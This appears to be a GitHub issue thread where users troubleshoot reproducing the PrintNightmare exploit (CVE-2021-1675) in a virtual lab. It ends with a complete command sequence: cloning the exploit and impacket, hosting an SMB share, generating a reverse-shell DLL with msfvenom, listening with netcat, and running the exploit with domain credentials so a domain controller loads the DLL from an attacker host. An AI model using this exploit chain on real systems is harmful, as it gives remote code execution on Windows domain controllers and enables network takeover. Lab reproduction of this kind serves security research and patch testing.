How to Reproduce (Virtual Environment): #19
Comments
Shall I reboot all machines?
Sometimes the spools service crashes. Make sure that the service is running; you can use rpcdump to verify.
Do the DC and the client both need to be checked?
Interesting, try to check manually on the DC,
I use Server 2012 as the DC, will it cause problems?
Basically no, but if I remember right I saw someone on Twitter claiming he had problems with that version.
OK, I will use your config. Thank you very much, I hope I can fix that before dinner. I have worked on it for 2 days...(;´༎ຶД༎ຶ`)
😄 It's all good, it took me 4 days until I was able to reproduce. Just try harder 😉
Server 2012 R2 (DC) will fail with a normal user.
I think this issue is because of the hard-coded shebang (e.g. - Changing to
Thank you, my using the payload windows/shell_reverse_tcp fails. Using the payload you suggest, windows/x64/shell_reverse_tcp is successful.
This is how I was able to reproduce the exploit in a virtual environment:
The best practice is to create a Python virtual environment:
python3 -m venv PrintNightmare
source PrintNightmare/bin/activate
git clone https://github.com/cube0x0/CVE-2021-1675.git
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
Spin up SMB share:
impacket-smbserver smb /tmp/
In case you have some problems with the SMB share, try to use the built-in SMBD service:
service smbd start
Create a reverse shell payload as a DLL:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /tmp/rev.dll
nc -lnvp 9001
python3 CVE-2021-1675.py <FQDN>/<USER_Name>:<PASSWORD>@<DC IP> '\\<ATTACKER_IP>\smb\rev.dll'
Machines: